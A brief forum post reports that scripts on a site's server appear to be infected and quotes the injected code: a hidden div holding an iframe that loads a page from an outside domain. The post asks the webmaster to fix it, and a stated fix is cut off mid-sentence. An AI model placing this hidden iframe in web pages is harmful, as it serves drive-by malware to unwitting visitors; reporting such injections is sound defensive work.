This really looks like malware in scripts on the server
Unfortunately I don't have a server login and its a little hard for me to fix it, have to wait for encode/webmaster to notice.
The script adds
<div style="display:none;"><iframe src="http://kokosina.in/t/go.php?sid=5" width="38" height="67" border="0" frameborder="0"></iframe></div>
Anyway, a proposed fix for now is to add
Update: redirected to a clean copy for now. Encode, webmaster, please fix this anyway.